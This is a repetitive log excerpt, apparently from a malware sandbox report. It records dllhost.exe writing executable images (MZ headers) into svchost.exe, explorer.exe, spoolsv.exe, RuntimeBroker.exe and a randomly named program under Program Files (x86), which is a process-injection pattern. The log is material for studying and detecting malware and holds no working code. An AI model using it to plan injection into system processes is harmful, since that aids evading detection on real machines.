Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2108B8D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 29166900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 3140000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2108B8D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF644F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DAC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24AE77D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 209A4BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C95C650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3FB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 16BA4E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24AE77D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 209A4BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1FB7A020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 19C72DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3FB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 143A2940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 16BA4E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 15BA5ED0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 19C72DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 27B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2EA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 15BA5ED0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 27B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2EA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: B60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: B60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2F10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2220000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 23C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2A10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2A70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 26F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 10B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 10D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2F40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: CE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: D00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2F40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 11E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 27E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 6B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 6D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 29D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 29F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: FD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2A60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: B10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 24D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 27B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2EA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 23D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 23F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: C10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 25A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 25C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2FB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 3140000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 21E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2400000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2420000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 23E0000 value starts with: 4D5A
